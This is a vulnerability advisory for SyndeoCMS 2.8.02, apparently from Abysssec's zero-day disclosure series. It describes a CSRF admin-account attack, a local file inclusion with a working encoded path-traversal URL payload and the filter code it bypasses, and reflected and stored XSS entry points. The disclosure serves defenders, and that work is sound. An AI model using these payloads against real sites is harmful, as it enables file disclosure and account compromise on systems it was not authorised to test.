''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 4 (0day) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' Title : syndeocms 2.8.02 Multiple Vulnerabilities Affected Version : syndeocms <= 2.8.02 Vendor Site : http://www.syndeocms.org/ Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1. CSRF - Add Admin Account:
. . . . . .
------------------------------------- 2. LFI (Local File Inclusion): http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00 in starnet\core\con_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F": line 61-73: switch ($modoption) // start of switch { case save_css : if (IsSet ($_POST['content'])) { $content = $_POST['content']; } if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us. { $filename = "themes/$theme/style.css"; ------------------------------------- 3. xss: in starnet\core\con_alerts.inc.php file "email" parameter when "modoption" is "save_alert": http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2 4. stored xss: in starnet\core\con_alerts.inc.php file "name" parameter when "modoption" is "save_alert": http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert ------------------------------